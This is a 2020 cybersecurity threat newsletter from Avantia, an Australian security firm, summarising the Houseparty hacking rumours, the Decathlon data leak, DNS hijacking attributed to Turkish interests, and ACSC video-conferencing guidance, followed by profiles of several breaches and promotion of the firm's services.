Search
  • Avantia Threat Update

ONLINE APP OFFERS $1MILLION REWARD

Updated: Apr 14



This Past Week: The ‘HouseParty‘ APP offers reward for proof; Sports Giant leaks 123 Million records; Recent Cyber attacks attributed to Turkey; ACSC - Video Conferencing How To;

Phishing attacks reel in a bountiful catch in the healthcare sector; How social distancing makes companies vulnerable to a data breach; Cybersecurity tips for working from home and major data leaks in AUSTRALIA; UNITED KINGDOM; CANADA; UNITED STATES & EUROPEAN UNION. 


Dark Web ID Trends:

Top Source Hits: ID Theft Forums

Top Compromise Type: Domain

Top Industry: Media & Entertainment

Top Employee Count: 251-500


________________________________________________________________________


HOUSEPARTY APP, FACING A WAVE OF DELETIONS, SAYS IT WILL PAY $1MILLION FOR PROOF OF HACKING SMEAR.

It was set to be the platform for these isolated times. Downloads of group-video app Houseparty surged in recent weeks as friends and family members, in a coronavirus-lockdown world, sought to move their IRL relationships online. But now Houseparty is facing a wave of deletions following rumors the platform is compromising users' data security. Here's what you need to know. In the past day, Twitter has been full of users claiming their Spotify, PayPal and iCloud accounts have been compromised and blaming Houseparty for the breach without providing proof. Epic Games, which owns the app, said the claims were inaccurate. "We've found no evidence to suggest a link between Houseparty and the compromises of other unrelated accounts," a spokesperson told the BBC. In any case, "how to delete Houseparty account" became the number one worldwide trending search term on Google in the 24 hours to Wednesday morning after posts urging users to ditch the app spread quickly. The app's developers are now offering a $1 million reward for proof of what it suspects was a "paid commercial smear campaign". We are investigating indications that the recent hacking rumors were spread by a paid commercial smear campaign to harm Houseparty. We are offering a $1,000,000 bounty for the first individual to provide proof of such a campaign to bounty@houseparty.com. It is not clear what those indications it is investigating are. Houseparty said earlier this week "all Houseparty accounts are safe". "The service is secure, has never been compromised, and doesn't collect passwords for other sites," it said. Paul Haskell-Dowland, the associate dean for computing and security in the School of Science at Edith Cowan University, said users should not be concerned the app had compromised their data security. "The likelihood is this is not a breach of any kind of the Houseparty app," he told the ABC. "If indeed there were, with an organisation behind it like Epic Games, it's very likely that that would have been addressed very quickly and they would be taking preventative measures and indeed reaching out to people to inform them." He also said that it was very unlikely a company with a reputation like Epic's would intentionally introduce a backdoor into its platform that would allow it to compromise other services on a user's device. Lukas Stefanko, from cybersecurity firm ESET, told Forbes the app "doesn't provide a lot of in-app options and settings, which creates less scenarios for exploiting security issues". Associate Professor Haskell-Dowland said it was either going to be an example of a commercial smear, as Houseparty alleged, or a case where a handful of users had been compromised, possibly because of what is known as a credential stuffing attack. That is where log-in details for users have ended up on a database following a prior hack like the one that hit Canva last year. Criminals then simply use bots to try those passwords out on other apps, like Houseparty, working on the assumption many people re-use passwords across platforms. Deleting your account will not help you if someone actually has gained access to accounts other than your Houseparty one. Still, Associate Professor Haskell-Dowland said uninstalling the app was the obvious solution if people were concerned about an app's security.

To do that: On an iPhone, users can delete their account by going into settings and privacy and clicking "delete account"

On an Android, users should email support@houseparty.com and ask for their account to be deleted and any data to be removed

As a standard protective measure, you should never use the same password for all your platforms, particularly if you are still using something like "password1" or "12345". Instead, use a password manager, which generates strong log-ins for all your platforms, and consider two-factor authentication. "I am using 1Password and I have got over 350 unique passwords stored within that system," Associate Professor Haskell-Dowland said."Should a particular set of credentials get lost or stolen, then it is only going to affect that one service."


SPORTS GIANT DECATHLON LEAKS 123 MILLION RECORDS

French sporting retail giant Decathlon has become the latest big brand to expose user data via a misconfigured database, leaking over 123 million records including customer and employee information, according to researchers. A team at vpnMentor uncovered the 9GB database on an unsecured Elasticsearch server. It contained information from Decathlon’s Spanish, and potentially also its UK, businesses. “The leaked Decathlon Spain database contains a veritable treasure trove of employee data and more. It has everything that a malicious hacker would, in theory, need to use to take over accounts and gain access to private and even proprietary information,” said vpnMentor. Leaked data included employee usernames, unencrypted passwords and personally identifiable information (PII) including social security numbers, full names, addresses, mobile phone numbers, addresses and birth dates. The leaked data also featured customer email and log-in information, all unencrypted. The vpnMentor team claimed that cyber-criminals could: use administrator log-ins to conduct corporate espionage, bombard customers and employees with convincing phishing emails and use PII to engage in identity fraud. It even argued that some employees could be in physical danger. “Employees’ positions and work locations are spread throughout this database, as well as their own physical home addresses,” the report noted. “This could lead to disgruntled former co-workers or irate customers tracking them down and threatening their physical safety and well-being.” Decathlon is claiming that, despite the large number of records contained in the database, only a small percentage relates to actual users. The unsecured database was discovered on February 12, with the company notified four days later. It took action almost immediately, closing down public access to the database on February 17. Decathlon joins a long line of organizations whose cloud security configurations have been found wanting. Already in 2020, vpnMentor has uncovered a leak of 30,000 records linked to US cannabis users, and thousands of UK business professionals who were exposed via a London-based consultancy.


HACKERS ACTING IN TURKEYS INTERESTS BELIEVED TO BE BEHIND RECENT CYBER ATTACKS

Sweeping cyberattacks targeting governments and other organizations in Europe and the Middle East are believed to be the work of hackers acting in the interests of the Turkish government, three senior Western security officials said. The hackers have attacked at least 30 organizations, including government ministries, embassies and security services as well as companies and other groups, according to a Reuters review of public internet records. Victims have included Cypriot and Greek government email services and the Iraqi government’s national security advisor, the records show. The attacks involve intercepting internet traffic to victim websites, potentially enabling hackers to obtain illicit access to the networks of government bodies and other organizations. According to two British officials and one U.S. official, the activity bears the hallmarks of a state-backed cyber espionage operation conducted to advance Turkish interests. The officials said that conclusion was based on three elements: the identities and locations of the victims, which included governments of countries that are geopolitically significant to Turkey; similarities to previous attacks that they say used infrastructure registered from Turkey; and information contained in confidential intelligence assessments that they declined to detail. The officials said it wasn’t clear which specific individuals or organizations were responsible but that they believed the waves of attacks were linked because they all used the same servers or other infrastructure. Turkey’s Interior Ministry declined to comment. A senior Turkish official did not respond directly to questions about the campaign but said Turkey was itself frequently a victim of cyberattacks. The Cypriot government said in a statement that the “relevant agencies were immediately aware of the attacks and moved to contain” them. “We will not comment on specifics for reasons of national security,” it added. Officials in Athens said they had no evidence the Greek government email system was compromised. The Iraqi government did not respond to requests for comment. The Cypriot, Greek and Iraqi attacks identified by Reuters all occurred in late 2018 or early 2019, according to the public internet records. The broader series of attacks is ongoing, according to the officials as well as private cybersecurity investigators. A spokeswoman for the UK’s National Cyber Security Centre, which is part of the GCHQ signals intelligence agency, declined to comment on who was behind the attacks. In the United States, the Office of the Director of National Intelligence declined to comment on who was behind the attacks and the Federal Bureau of Investigation did not respond to a request for comment. The attacks highlight a weakness in a core pillar of online infrastructure that can leave victims exposed to attacks that happen outside their own networks, making them difficult to detect and defend against, cybersecurity specialists said. The hackers used a technique known as DNS hijacking, according to the Western officials and private cybersecurity experts. This involves tampering with the effective address book of the internet, called the Domain Name System (DNS), which enables computers to match website addresses with the correct server. By reconfiguring parts of this system, hackers were able to redirect visitors to imposter websites, such as a fake email service, and capture passwords and other text entered there. Reuters reviewed public DNS records, which showed when website traffic was redirected to servers identified by private cybersecurity firms as being controlled by the hackers. All of the victims identified by Reuters had traffic to their websites hijacked - often traffic visiting login portals for email services, cloud storage servers and online networks — according to the records and cybersecurity experts who have studied the attacks. The attacks have been occurring since at least early 2018, the records show. While small-scale DNS attacks are relatively common, the scale of these attacks has alarmed Western intelligence agencies, said the three officials and two other U.S. intelligence officials. The officials said they believed the attacks were unrelated to a campaign using a similar attack method uncovered in late 2018. As part of these attacks, hackers successfully breached some organizations that control top-level domains, which are the suffixes that appear at the end of web addresses immediately after the dot symbol, said James Shank, a researcher at U.S. cybersecurity firm Team Cymru, which notified some of the victims. Victims also included Albanian state intelligence, according to the public internet records. Albanian state intelligence had hundreds of usernames and passwords compromised as a result of the attacks, according to one of the private cybersecurity investigators, who was familiar with the intercepted web traffic. The Albanian State Information Service said the attacks were on non-classified infrastructure, which does not store or process any “any information classified as ‘state secret’ of any level.” Civilian organizations in Turkey have also been attacked, the records show, including a Turkish chapter of the Freemasons, which conservative Turkish media has said is linked to U.S.-based Muslim cleric Fethullah Gulen accused by Ankara of masterminding a failed coup attempt in 2016. The Great Liberal Lodge of Turkey said there were no records of cyberattacks against the hijacked domains identified by Reuters and that there had been “no data exfiltration.” “Thanks to precautions, attacks against the sites are not possible,” a spokesman said, adding that the cleric has no affiliation with the organization. The cleric has publicly denied masterminding the attempted coup, saying “it’s not possible,” and has said he is always against coups. A spokesman for Gulen said Gulen was not involved in the coup attempt and has repeatedly condemned it and its perpetrators. Gulen has never been associated with the Freemason organization, the spokesman added.

ACSC THREAT UPDATE: VIDEO CONFERENCING - HOW TO DO IT RIGHT.

In light of COVID-19 Pandemic many businesses and individuals are now turning to web conferencing systems like Zoom; Skype; Google Hangouts; Go To Meeting and Cisco WebEx to connect online. Web conferencing solutions (also commonly referred to as online collaboration tools) often provide audio/video conferencing, real-time chat, desktop sharing and file transfer capabilities. As we increasingly use web conferencing to keep in touch while working from home, it is important to ensure that this is done securely without introducing unnecessary privacy, security and legal risks. This document provides guidance on both how to select a web conferencing solution and how to use it securely.I

Selecting a web conferencing solution When selecting a web conferencing solution, it is important that organisations ask themselves the following questions.

Is the service provider based in Australia? The use of offshore web conferencing solutions introduces additional business and security risks. For example, laws in other countries may change without notice and foreign-owned service providers that operate in Australia may still be subject to the laws of a foreign country. In addition, service providers who are located offshore may be subject to lawful and covert data collection requests and access an organisation’s data without their knowledge.

What is the service provider’s track record? A service provider’s actions in response to privacy issues and cyber security incidents is important, as is how quickly they disclose and take effective action to remediate security vulnerabilities in their web conferencing solution. Look for a service provider that actively and quickly engages with their customers, advocates for data privacy rights and proactively addresses cyber security issues, such as having a vulnerability disclosure program. Conducting research on a service provider’s historical responses will help identify how seriously they treat these issues.

Are privacy, security and legal requirements being met? Prior to agreeing to a service provider’s terms and conditions, organisations should seek privacy, security and legal advice. Notably, the terms and conditions should include specific clauses that address organisations’ legal, privacy and security requirements. Without privacy and security requirements being specified, organisations may not be able to verify a service provider’s security claims or whether their information is being appropriately used or not. In particular, attention should be paid to whether a service provider claims ownership of any recorded conversations and content, metadata, or files that are created or shared when using their web conferencing solution. Finally, when seeking legal advice, organisations are less likely to inadvertently accept terms and conditions that breach financial or liability rules.

What information and metadata does the service provider collect? Information and metadata can, and often will be, collected by a service provider. Such information can include (but is not limited to) names, roles, organisations, email addresses, and usernames and passwords of registered users, as well as information about devices they use. As this information may be sensitive, organisations may need to provide advice to staff as to the appropriate level of information they should disclose during the registration process. Knowing how this information will be used by a service provider will help inform organisations of the privacy, security and legal risks when using their web conferencing solution.

Does the service provider use strong encryption? A service provider should be encrypting data both while it is at rest (being stored by the service provider) and while it is in transit (being transferred been different devices). This is to ensure that the data can’t be read by others that don’t have a need to know. One thing to specifically look for is whether a web conferencing solution use strong encryption, such as Transport Layer Security (TLS), to protect data while it is in transit. Web conferencing solutions that exclusively support TLS versions 1.2 and 1.3 inherently offer more protection for data transmitted across untrusted networks such as the internet.

What is the reliability and scalability of the service provider’s web conferencing solution? As the number of organisations and staff using a web conferencing solution increases, it can become overloaded. As such, it is important to ensure that any web conferencing solution will be both reliable and available in times of increased demand. Understanding the capabilities of a web conferencing solution, such as the number of simultaneous connections that can be supported, will ensure organisations and their staff are able to collaborate even during times of increased demand. If an existing web conferencing solution does not meet business requirements in times of increased demand, organisations should consider increasing the capacity of the existing solution, or using alternative methods of relaying information, prior to looking for alternative solutions that may introduce additional privacy, security and legal risks.


Using a web conferencing solution

When using a web conferencing solution, it is important that organisations practice the following activities.

Configure the web conferencing solution securely Review the service provider’s documentation for the security features and recommended configurations related to their web conferencing solution. In doing so, note that default security settings in web conferencing solutions may need to be configured to meet organisational security needs. Furthermore, advise staff using the web conferencing solution on personal devices to ensure that they have applied all security patches for their devices and their devices are as secure as reasonably practicable.

Establish meetings securely When hosting a meeting, consider how invitations, website links and access credentials will be distributed to participants. If permitting guests, send meeting details and access credentials separately via email or encrypted messaging apps. Do not share website links or access credentials on publicly-accessible websites or social media. Finally, remember to update any access credentials periodically, such as once a month, or after they have been provided to any guests. This will reduce the risk of guests joining other meetings they haven’t been invited to.

Be aware of unidentified participants Only allow invited participants to join a meeting, and once all participants are present, consider locking the meeting so no one else can join. However, in some cases, it may not be possible to identify individual participants, such as when they join via a telephone call. In such cases, take note of sounds or visual notifications indicating that participants are joining the meeting, and ask any unknown participants to identify themselves. If unknown participants are unable to appropriately identify themselves, they should be disconnected by the meeting host.

Be aware of surroundings Using a private location for meetings will help maintain confidentiality. If a private location isn’t possible, using headphones can ensure that when working in a shared location only approved meeting participants will hear the full discussions. In addition, muting the microphone when not actively speaking improves the meeting experience by eliminating unwanted background noises, such as keyboard typing sounds or audio feedback loops, and prevents accidentally broadcasting private or sensitive discussions that may be happening nearby.

Finally, with high definition webcams now the norm, participants may unwittingly broadcast private or sensitive details in their background. Where video is required for a meeting, try to position cameras so they only capture participants’ faces. Alternatively, consider using background blurring features if they are available, noting these may be specific to certain service providers

Be mindful of conversations. Be aware of the potential private nature or sensitivity of workplace conversations, and limit discussions in meetings to those approved to be conducted using a web conferencing solution. It is also good practice to set expectations prior to a meeting, for example, whether the contents of the meeting will be recorded or made public. For Commonwealth entities, consider what sensitivity or classification has been authorised for discussions over any web conferencing solutions.

Only share what is required If sharing screen content for a meeting, it is best practice to share an individual application instead of a device’s entire screen. Alternatively, a web conferencing solution may be able to select only a section of a device’s screen to share. However, if screen sharing is not required, either disable the functionality or limit its use to only the meeting host. For similar reasons, capabilities that record and automatically transcribe calls, subtitle videos or share files can create a risk of inadvertently sharing more content than intended.


When selecting web conferencing solutions, please see the Cyber Supply Chain Risk Management publication at https://www.cyber.gov.au/publications/cyber-supply-chain-risk-management.

______________________________________________________________________________


THREAT FOCUS: Tandem Diabetes Care - UNITED STATES

https://portswigger.net/daily-swig/healthcare-data-breach-medical-device-manufacturer-discloses-phishing-attack


Exploit: Phishing scam

Tandem Diabetes Care: Medical device manufacturer

Risk to Small Business: 2.555= Severe Five employees fell for a phishing scam that gave hackers access to email accounts containing customer data between January 17 and January 20, 2020. Although the company acted quickly to secure the compromised employee accounts, they were unable to recoup the stolen information. Given the sensitive nature of their industry, Tandem Diabetes Care will likely face increased regulatory scrutiny and hefty financial penalties.

Individual Risk: 2.428 = Severe Although Tandem Diabetes Care has expressed in the integrity of their data storage, hackers likely had access to names, contact information, service-related details – even some patients’ Social Security numbers were exposed in the breach. Victims should consider enrolling in credit and identity monitoring services.    Customers Impacted: 140,000

Effect On Customers: In response to this breach, Tandem Diabetes Care is updating its email security protocols to prevent a similar incident in the future. However, phishing scams account for a significant portion of all data breaches, and preparing for these attacks should be a built-in component of every organisation’s defense strategy.

Risk Levels:

1 – 1.5 = Extreme Risk 1.51 – 2.49 = Severe Risk 2.5 – 3 = Moderate Risk *The risk score is calculated using a formula that considers a wide range of factors related to the assessed breach.


Avantia Corporate Services & ID Agent to the Rescue:  BullPhish ID simulates phishing attacks and conducts security awareness training campaigns to educate your employees, making them the best defense against cybercrime. Find out more here: https://www.avantiacybersecurity.com/overwatch or call Avantia on 07 30109711 (Office Hours).



THREAT FOCUS: University of Utah Health - UNITED STATES

https://www.securityweek.com/university-utah-health-discloses-data-breach?&web_view=true


Exploit: Phishing scam

University of Utah Health: Research and teaching hospital

Risk to Small Business: 1.889= Severe A phishing scam provided hackers with access to the University of Utah Health’s network for more than a month, beginning on January 22, 2020. In addition, the healthcare provider discovered malware on its network that allowed hackers to access patient data. Although the University of Utah Health responded quickly, bad actors still had prolonged access to company and customer data, including HIPPA-protected healthcare records – creating financial, reputational, and regulatory consequences both now and in the future.

Individual Risk: 2.428= Severe The compromised accounts included patients’  names, dates of birth, medical record numbers, and clinical data. This information can be used to craft authentic-looking spear phishing campaigns. Victims should carefully evaluate all digital communications, and consider enrolling in identity and credit monitoring services to ensure that this information isn’t being misused in other ways.  

Customers Impacted: Unknown

Effect On Customers: Like many companies responding to a data breach, the University of Utah Health is promising changes to its defensive posture to prevent a similar breach in the future. However, companies should assume that malware attacks and phishing scams are an “if” not a “when” proposition, and they should prepare their defensive posture accordingly.

Risk Levels:

1 – 1.5 = Extreme Risk 1.51 – 2.49 = Severe Risk 2.5 – 3 = Moderate Risk *The risk score is calculated using a formula that considers a wide range of factors related to the assessed breach.


Avantia Corporate Services & ID Agent to the Rescue: BullPhish ID simulates phishing attacks and conducts security awareness training campaigns to educate your employees, making them the best defense against cybercrime. Find out more here: https://www.avantiacybersecurity.com/overwatch or call Avantia on 07 30109711 (Office Hours) for more information.



THREAT FOCUS: Tupperware Products - UNITED STATES

https://www.zdnet.com/article/tupperware-website-hacked-and-infected-with-payment-card-skimmer/?&web_view=true


Exploit: Malware attack

Tupperware: Home products line

Risk to Small Business: 2.334= Severe Hackers infiltrated Tupperware’s online store, injecting payment skimming malware into the checkout process. The malicious script was active for at least five days, and it effectively mimicked Tupperware’s official payment form. After shoppers entered their data into the fake form, a “time out” error appeared, redirecting customers to the actual payment page and disguising the theft, which allowed it to go undetected.  

Individual Risk: 2.428= Severe The payment skimming malware collected customer data entered including names, addresses, phone numbers, credit card numbers, expiration dates, and CVV codes. This data could allow hackers to commit financial theft or identity fraud. Those impacted by the breach should immediately notify their banks, as they will likely need to be issued new payment cards and carefully monitor their accounts for misuse.

Customers Impacted: Unknown

Effect On Customers: The COVID-19 pandemic has heightened the already-important online shopping experience for many businesses, and online shopping is a singular respite in an otherwise bleak outlook for retailers. Companies can’t afford to lose customers because of a cybersecurity vulnerability. Many customers indicate that they will not return to an online store after a data breach, which means that companies looking to capitalize on their online stores need to make sure this avenue is secure.

Risk Levels: 1 – 1.5 = Extreme Risk 1.51 – 2.49 = Severe Risk 2.5 – 3 = Moderate Risk *The risk score is calculated using a formula that considers a wide range of factors related to the assessed breach.


Avantia Cyber Security & ID Agent to the Rescue: Dark Web ID can find out how payment data is being used on the Dark Web, even in the case of a malware attack. Avantia works with our US Partners to strengthen our Clients security suite by offering industry-leading detection. Find out more here: https://www.avantiacybersecurity.com/overwatch or call 07 3010 9711 (Office Hours)

THREAT FOCUS Finastra Technology - CANADA

https://krebsonsecurity.com/2020/03/security-breach-disrupts-fintech-firm-finastra/


Exploit: Ransomware 

Finastra: Financial technology provider

Risk to Small Business: 2.556= Severe A ransomware attack has forced Finastra to bring its Canadian services offline temporarily. The company worked quickly to secure its IT infrastructure after detecting the breach, but those efforts will not alleviate the high recovery and reputational cost of the incident. Finastra believes that company and customer data is secure, and that customer and employee data was not exposed or exfiltrated nor were client networks impacted.  Individual Risk: None

Customers Impacted: Unknown

Effect On Customers: Ransomware attacks are on the rise and uniquely consequential, carrying incredible repair costs and unparalleled opportunity costs as companies are rendered unable to conduct business and employees are left unable to work. Since there are no satisfying solutions to a ransomware attack once it strikes, companies should turn their attention to ensuring that their cyber defensive capabilities can turn away this growing threat.

Risk Levels:

1 – 1.5 = Extreme Risk 1.51 – 2.49 = Severe Risk 2.5 – 3 = Moderate Risk *The risk score is calculated using a formula that considers a wide range of factors related to the assessed breach.


Avantia Cyber Security & Huntsman Digital Auditor to the Rescue: Helping SME’s to understand the importance of security is no easy task. With an ‘Essential8’ Digital Security Audit we offer a remote access, independent ‘real time’ audit of our clients critical operational infrastructure systems to determine where the gaps are with recommendations for remediation.

Its the first step to real cyber security. Call Avantia’s office on 07 30109711 or visit: https://www.avantiacybersecurity.com/cyber-security-audit

THREAT FOCUS: Data Deposit Box - CANADA

https://www.securitymagazine.com/articles/91985-data-breach-report-cloud-storage-exposes-users-private-information


Exploit: Unsecured database 

Data Deposit Box: Cloud storage provider

Risk to Small Business: 2.334= Severe Cybersecurity researchers identified an unsecured database containing thousands of customer files uploaded to the company’s secure cloud storage service. The exposed records include information dating back to 2016, which the company eventually secured. However, it’s unclear how long cybercriminals could have accessed this data or why it took Data Deposit Box nearly a week to close the database after being notified that it wasn’t password protected.

Individual Risk: 2.428= Severe The exposed database includes users’ personally identifiable information that was uploaded to the cloud service, including admin login credentials, IP addresses, email addresses, and GUIDs. The login credentials were stored in plain text, so those impacted by the breach should immediately change their Data Deposit Box password and any other account credentials using the same password combination.  

Customers Impacted:  270,000

Effect On Customers: The cost of a data breach is at an all-time high, and it’s expected to continue climbing higher in the years ahead. An unforced error, like failing to password protect a database, is especially troubling for a company that is trusted to provide secure services. As a result of this seeming carelessness, Data Deposit Box has undermined its core value proposition and incurred a costly recovery process, both of which were entirely avoidable.

Risk Levels:

1 – 1.5 = Extreme Risk 1.51 – 2.49 = Severe Risk 2.5 – 3 = Moderate Risk *The risk score is calculated using a formula that considers a wide range of factors related to the assessed breach.


Avantia Cyber Security & ID Agent to the Rescue: Good passwords are the single fastest way to secure your data. With AuthAnvil, you can protect your employees’ password integrity. Our integrated multi-factor authentication, single sign-on, and identity management solutions will protect your credentials and your data. Find out more at:  https://www.avantiacybersecurity.com/overwatch or call Avantia on 07 3010 9711 (Office Hours)

THREAT FOCUS: Hammersmith Medicines Research - UNITED KINGDOM https://www.forbes.com/sites/daveywinder/2020/03/23/covid-19-vaccine-test-center-hit-by-cyber-attack-stolen-data-posted-online/#584bcdc818e5


Exploit: Ransomware  

Hammersmith Medicines Research: Medical testing provider.  

Risk to Small Business: 2.112 = Severe Hammersmith Medicines Research was hit with a ransomware attack that encrypted its systems and stole company data that was later posted online. This incident is particularly ill-timed as Hammersmith Medicines Research is a provider of critical COVID-19 testing. The attack was perpetrated by the Maze ransomware group, who previously promised not to attack healthcare facilities during the COVID-19 outbreak. It’s a reminder that there is no honor among thieves, and companies should not use their promises as an excuse to avoid putting their best foot forward when it comes to cybersecurity.

Individual Risk: 2.714 = Moderate It’s clear that cybercriminals exfiltrated company data in the attack. However, Maze attackers only published a sample online, intending to pressure the company to pay the ransom. All patients and employees should assume that their personal information was compromised, and they should carefully monitor their accounts for usual activity or messages.

Customers Impacted: Unknown

Effect On Customers: As we reported previously, healthcare providers are an especially enticing target for cybercriminals because they collect and store uniquely sensitive and valuable information. In 2020, many ransomware attacks also include a data breach,  incurring the ire of regulators and clients. Every healthcare provider has millions of reasons to prevent a ransomware attack before it strikes.

Risk Levels:

1 – 1.5 = Extreme Risk 1.51 – 2.49 = Severe Risk 2.5 – 3 = Moderate Risk *The risk score is calculated using a formula that considers a wide range of factors related to the assessed breach.


Avantia Cyber Security & Huntsman Digital Auditor to the Rescue: Helping SME’s to understand the importance of security is no easy task. With an ‘Essential8’ Digital Security Audit we offer a remote access, independent ‘real time’ audit of our clients critical operational infrastructure systems to determine where the gaps are with recommendations for remediation.

Its the first step to real cyber security. Call Avantia’s office on 07 30109711 or visit: https://www.avantiacybersecurity.com/cyber-security-audit


THREAT FOCUS: Norwegian Cruise Line - EUROPEAN UNION

http://techgenix.com/norwegian-cruise-line-data-breach/


Exploit: Phishing scam

Norwegian Cruise Line: Cruise tourism provider

Risk to Small Business: 2.334 = Severe A Norwegian Cruise Line employee was reeled in by a phishing scam that compromised the personal details of thousands of independent travel agents. The information was then posted on Dark Web forums, making it widely accessible to bad actors. The company, already reeling from the COVID-19 crisis, has now damaged its relationship with partners that are critical to its recovery.    

Individual Risk: 2.714= Moderate The data breach includes plain text passwords and email addresses for thousands of travel agents. While many are associated with TUI and Virgin Holidays, it also covers independent agents and those working with other organizations. Those impacted by the breach should immediately reset their login credentials while also monitoring their accounts for unusual or suspicious activity.    

Customers Impacted: 27,000

Effect On Customers: How it Could Affect Your Customers’ Business: This incident underscores the heightened risk and outsized consequences of falling for scams during the COVID-19 crisis. With more employees working remotely and a general, pervasive sense of uncertainty overshadowing many companies, there is a higher risk of damage from cyberattacks including phishing and ransomware encountered (and interacted with) by anxious employees.

Risk Levels:

1 – 1.5 = Extreme Risk 1.51 – 2.49 = Severe Risk 2.5 – 3 = Moderate Risk *The risk score is calculated using a formula that considers a wide range of factors related to the assessed breach.


Avantia Cyber Security & Huntsman Digital Auditor to the Rescue: Helping SME’s to understand the importance of security is no easy task. With an ‘Essential8’ Digital Security Audit we offer a remote access, independent, ‘real time’ audit of our clients critical operational infrastructure systems to determine where the gaps are, with recommendations for remediation. Its the first step to real cyber security. Call Avantia’s office on 07 30109711 or visit: https://www.avantiacybersecurity.com/cyber-security-audit



THREAT FOCUS: Henning Harders Logistics - AUSTRALIA  

https://www.itwire.com/security/ransomware-group-said-to-be-publishing-freight-forwarding-firm-s-data.html


Exploit: Ransomware

Henning Harders: Freight forwarding and logistics firm  

Risk to Small Business: 2.556 = Moderate Henning Harders was the victim of a ransomware attack that restricted its operations between March 15 and March 18. However, the company, which refused to pay the ransom demand, is having continual cybersecurity trouble. Hackers have begun posting the company’s stolen data on the Dark Web and using the information to send spear phishing emails to employees. While the company is touting its restored operations, it’s clear that it will have to deal with a lingering data security issue that will not be resolved quickly.

Individual Risk: 2.857 = Moderate Henning Harders was the victim of a ransomware attack that restricted its operations between March 15 and March 18. However, the company, which refused to pay the ransom demand, is having continual cybersecurity trouble. Hackers have begun posting the company’s stolen data on the Dark Web and using the information to send spear phishing emails to employees. While the company is touting its restored operations, it’s clear that it will have to deal with a lingering data security issue that will not be resolved quickly.

Customers Impacted: Unknown

Effect On Customers: Increasingly, ransomware attacks are just a first step for cybercriminals, who will continue to exploit businesses by selling company data on the Dark Web or using it to enact phishing scams. The high recovery expense, opportunity cost, reputational damage, and productivity degradation of ransomware attacks make this growing menace as a uniquely harrowing cyber risk.

Risk Levels:

1 – 1.5 = Extreme Risk 1.51 – 2.49 = Severe Risk 2.5 – 3 = Moderate Risk *The risk score is calculated using a formula that considers a wide range of factors related to the assessed breach.


Avantia Cyber Security & ID Agent to the Rescue: Dark Web ID monitors the Dark Web to find out if your employee or customer data has been compromised. We work with Clients to strengthen their security suite by offering industry-leading detection. Discover more at: https://www.avantiacybersecurity.com/overwatch or call Avantia on 07 3010 9711 (Office Hours)

POSTSCRIPT:


Expert Cybersecurity Tips for Working From Home   

The COVID-19 pandemic has brought about an unprecedented work-from-home experiment as social distancing measures require millions of employees around the world to work from home. As we’ve already seen, this presents unique cybersecurity challenges for both companies and their employees. To help you secure data while working remotely, here are four simple steps that every company and employee can take

1. Use a trusted VPN. These services can provide a layer of protection by encrypting network traffic and making it more difficult for bad actors to spy on your activity. Choose a reputable VPN provider, as a number of VPN scams have tricked employees into downloading malicious software that steals their login credentials

2. Enable two-factor authentication. Account security is critical, especially when entire companies are working remotely. Enabling two-factor authentication is an affordable and effective way to keep company accounts secure at all times.  

3. Refrain from using personal devices. Many employees may be tempted to use personal devices for work-related tasks, especially when working from home. It’s always possible that these devices contain malware or other exploits that could compromise company data.  

4. Look out for Phishing Scams. Cybercriminals are always looking for ways to capitalise on our vulnerabilities. At this moment, COVID-19-related phishing scams abound, targeting employees’ sense of isolation and vulnerability to capture critical information.  


Social Isolation Puts Company Data at Risk 

As the COVID-19 pandemic continues to cause chaos for businesses, we continue to be committed to helping keep your data secure. To that end, we’ve compiled several resources to help you navigate this unique terrain, and if we can serve you in any way, please don’t hesitate to contact us.     

This week, we wanted to highlight a cybersecurity vulnerability that is especially prescient as many people work from home and practice social distancing. According to a study by the Better Business Bureau, the FINRA Investor Education Foundation, and the Stanford Center on Longevity, people are more likely to fall for a scam when they are socially isolated.  Cybercriminals are already taking advantage of our new digital environment sending a flurry of phishing and other fraudulent messages meant to compromise personal and company data, and isolated employees are more vulnerable than usual to these attack methodologies. Therefore, in addition to preparing employees for this troubling trend, make an effort to reach out to employees, coworkers, and family members to make personal connections during this challenging time.  



Disclaimer*:

Avantia Corporate Services Pty Ltd T/A Avantia Cyber Security provides the content in this publication to the reader for general information purposes only and has compiled the content from a number of sources in Australia, the USA, and up to 56 other countries who provide cyber breach and cyber security information to us in real time. Given their international focus and experience in the cyberspace arena we believe their data to be accurate and reliable, however, we give no warranty (implied or otherwise), as to the contents accuracy or fitness for use. No validation or investigation has been performed by Avantia Corporate Services or the Author as to its accuracy or reliability. Readers should conduct their own investigation and come to their own conclusions before taking any action.

*COPYRIGHT 2020* Avantia Corporate Services - All Rights Reserved.

(457,000)



Want The Information  Cyber Criminal's  Don't Want You To Know?

Subscribe below to receive our weekly Threat Updates straight to your inbox.

Call (07) 3010 9711 

info@avantiacorp.com.au

 

Avantia Corporate Services Pty Ltd,                    Level 7, 320 Adelaide Street

Brisbane, Queensland 4000

AUSTRALIA.

  • LinkedIn Social Icon
  • Facebook Social Icon

DISCLAIMER*: Avantia Corporate Services Pty Ltd and Avantia Cyber Security provides the content in this publication to the reader for general information purposes only and has compiled the content from a number of sources in Australia, the USA, and up to 56 other countries who provide cyber breach and cybersecurity information to us in real-time. Given their international focus and experience in the cyberspace arena, we believe their data to be accurate and reliable, however, we give no warranty (implied or otherwise), as to the content's accuracy or fitness for use. No validation or investigation has been performed by Avantia Corporate Services or the Author as to its accuracy or reliability. Readers should conduct their own investigation and come to their own conclusions before taking any action.

*COPYRIGHT 2020* Avantia Corporate Services  PTY LTD - All Rights Reserved.